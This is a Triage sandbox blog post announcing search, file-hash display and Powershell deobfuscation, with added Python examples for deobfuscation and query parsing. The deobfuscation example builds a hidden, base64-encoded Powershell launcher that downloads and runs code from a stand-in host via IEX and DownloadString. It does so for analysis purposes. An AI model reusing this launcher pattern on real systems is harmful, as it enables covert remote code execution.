Triage Thursday

Search, Powershell Deobfuscation, and File Hash Display


Welcome back to our weekly Triage Thursday (or, this week, Triage Friday) blog series. We're a day late with the blog this week because we have been putting the finishing touches to a major new feature. Today we are pleased to introduce Triage's new Search functionality, a major update that we have been working on for quite some time. It allows analysis reports to be filtered on a range of Triage metadata (for example family names and tags) and on behavioural IoCs.

Search has been heavily requested by users and we have done our best to accommodate as many use-cases as possible in this initial release. We’ll go into more detail on the new feature below. Currently it is only available on our public cloud at - we will be rolling it out to private cloud instances over the coming weeks.

Alongside Search we are also releasing a couple of other new features. Firstly, another widely requested feature: visible hashes for dropped files. These can be found in the Download section at the bottom of each report and include MD5, SHA1, SHA256 and SHA512 hashes for each file (note that this does not include memory dumps).

Secondly, we have been working to expand Triage's support for Powershell scripts. As of today's update, Powershell detected during analysis is deobfuscated and made visible directly in the report UI, making it easier to compare code across samples and find similar analyses.
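To make the deobfuscation step concrete, here is an added example (not Triage's own deobfuscator, whose internals the post does not describe) that peels the two layers most often seen in Powershell launchers: an -EncodedCommand argument (base64 over UTF-16LE) and strings assembled at runtime from `'a' + 'b'` fragments or `[char]` casts. The sample command line, the inner script and the URL in it are constructed for this example; the flag spellings and folding rules are assumptions about common obfuscation, not a description of Triage's logic.

```python
import base64
import re

# Constructed sample: the inner script is harmless and exists only to show the
# two layers handled below (an -EncodedCommand wrapper and '+'-concatenated
# string fragments). The command-line shape is the conventional launcher form.
INNER_SCRIPT = (
    "$u = ('http://' + 'exa' + 'mple.test/' + 'payload.txt'); "
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it:
    UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + encode_command(INNER_SCRIPT)

# powershell.exe accepts abbreviated switch names; the common spellings of
# -EncodedCommand are covered here (assumption: -e, -ec, -en, -enc, full name).
_ENC_FLAG = re.compile(r"(?<!\S)-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)
# [char]104 or [char]0x68 -> 'h'
_CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9A-Fa-f]+|\d+)", re.I)
# ('a' + 'b' + 'c') -> 'abc'; single-quoted literals only, no escape handling
_CONCAT = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")
_QUOTED = re.compile(r"'([^']*)'")
_URL = re.compile(r"""https?://[^\s'"()]+""")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if absent."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # samples often drop the base64 padding
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def fold_strings(script: str) -> str:
    """Collapse [char] casts and parenthesised '+' concatenations so string
    fragments read as one literal. Repeats until nothing changes, because a
    folded group can expose an enclosing one."""
    def cast(m):
        v = m.group(1)
        return "'" + chr(int(v, 16) if v.lower().startswith("0x") else int(v)) + "'"

    def join(m):
        return "'" + "".join(_QUOTED.findall(m.group(0))) + "'"

    script = _CHAR_CAST.sub(cast, script)
    prev = None
    while prev != script:
        prev, script = script, _CONCAT.sub(join, script)
    return script


def deobfuscate(cmdline: str) -> dict:
    """Peel the encoded layer, fold string building, and pull out URLs."""
    decoded = decode_encoded_command(cmdline)
    body = decoded if decoded is not None else cmdline
    folded = fold_strings(body)
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "folded": folded,
        "iocs": _URL.findall(folded),
    }


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    print(result["folded"])
    print(result["iocs"])
```

The folded form is what you want to compare between samples: two launchers that differ only in how the URL string is split collapse to the same literal, while the raw base64 blobs look unrelated. Real samples stack further layers (compression, `-f` format strings, `-join` over reversed arrays), which this example deliberately does not attempt.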

We hope these new features help you to find data more easily and get more out of Triage. We’re looking forward to hearing your feedback on them - you can get in touch through the website, on Twitter, or using the Feedback option in the Triage UI.

We wanted Search to enable users to carry out some basic threat hunting, rather than just locating specific files. To this end the initial version supports a range of filters and logical operators to build complex queries based on analysis results.

Let’s take a look at the available filters:

These filters can be combined with the logical operators AND, OR and NOT to form longer queries. You can find some examples to get started on the Search page.

The most useful query for many users may be the following one, which excludes all Emotet analyses. There are days when tens of thousands of Emotet samples are processed, which makes the report list almost impossible to browse. On those days this query helps you browse the rest of our reports:

NOT family:emotet
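To show how such queries combine, here is an added example (not Triage's search backend) of a small evaluator for this query shape: `field:value` terms joined with AND, OR and NOT, with parentheses for grouping. The sample reports, the `tag` field name and the precedence NOT > AND > OR are assumptions made for the example; the post names family and tags as searchable metadata but does not spell out the syntax beyond `NOT family:emotet`.

```python
import re

# Constructed sample reports. Only the two metadata fields the post names
# (family and tags) are modelled; ids, families and tags are illustrative.
REPORTS = [
    {"id": "r1", "family": ["emotet"], "tags": ["banker", "trojan"]},
    {"id": "r2", "family": ["agenttesla"], "tags": ["stealer", "keylogger"]},
    {"id": "r3", "family": [], "tags": ["macro", "downloader"]},
    {"id": "r4", "family": ["emotet", "trickbot"], "tags": ["banker", "trojan", "loader"]},
]

KEYWORDS = {"AND", "OR", "NOT"}
# query field name -> report key; the 'tag' name is an assumption of this example
FIELDS = {"family": "family", "tag": "tags"}

# Tokens: parentheses, field:value terms, or bare words (the keywords)
_TOKEN = re.compile(r"\s*(\(|\)|[A-Za-z_]+:[^\s()]+|[A-Za-z]+)")


def tokenize(query: str) -> list:
    tokens, pos = [], 0
    while pos < len(query):
        m = _TOKEN.match(query, pos)
        if not m:
            if not query[pos:].strip():
                break  # only trailing whitespace left
            raise ValueError(f"unexpected input at {pos}: {query[pos:]!r}")
        tok = m.group(1)
        tokens.append(tok.upper() if tok.upper() in KEYWORDS else tok)
        pos = m.end()
    return tokens


class Parser:
    """Recursive descent over: expr := and (OR and)*; and := not (AND not)*;
    not := NOT not | primary; primary := '(' expr ')' | field:value.
    Precedence NOT > AND > OR is an assumption of this example."""

    def __init__(self, tokens):
        self.toks, self.i = tokens, 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def take(self):
        tok = self.peek()
        self.i += 1
        return tok

    def parse(self):
        node = self.expr()
        if self.peek() is not None:
            raise ValueError(f"unexpected token {self.peek()!r}")
        return node

    def expr(self):
        node = self.and_expr()
        while self.peek() == "OR":
            self.take()
            node = ("or", node, self.and_expr())
        return node

    def and_expr(self):
        node = self.not_expr()
        while self.peek() == "AND":
            self.take()
            node = ("and", node, self.not_expr())
        return node

    def not_expr(self):
        if self.peek() == "NOT":
            self.take()
            return ("not", self.not_expr())
        return self.primary()

    def primary(self):
        tok = self.take()
        if tok == "(":
            node = self.expr()
            if self.take() != ")":
                raise ValueError("expected ')'")
            return node
        if tok is None or tok in KEYWORDS or ":" not in tok:
            raise ValueError(f"expected field:value term, got {tok!r}")
        field, _, value = tok.partition(":")
        key = FIELDS.get(field.lower())
        if key is None:
            raise ValueError(f"unknown filter {field!r}")
        return ("term", key, value.lower())


def evaluate(node, report) -> bool:
    kind = node[0]
    if kind == "term":  # case-insensitive membership in the report's list field
        return node[2] in (v.lower() for v in report.get(node[1], []))
    if kind == "not":
        return not evaluate(node[1], report)
    if kind == "and":
        return evaluate(node[1], report) and evaluate(node[2], report)
    return evaluate(node[1], report) or evaluate(node[2], report)


def is_valid(query: str) -> bool:
    try:
        Parser(tokenize(query)).parse()
        return True
    except ValueError:
        return False


def search(query: str, reports=REPORTS) -> list:
    """Return the ids of reports matching the query, in report order."""
    ast = Parser(tokenize(query)).parse()
    return [r["id"] for r in reports if evaluate(ast, r)]
```

The precedence matters for hunting queries: `tag:stealer OR tag:macro AND family:emotet` groups as `tag:stealer OR (tag:macro AND family:emotet)`, so add parentheses when the intent is `(tag:stealer OR tag:macro) AND family:emotet`. Whatever a real search backend does, writing the grouping out explicitly avoids depending on its precedence rules.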
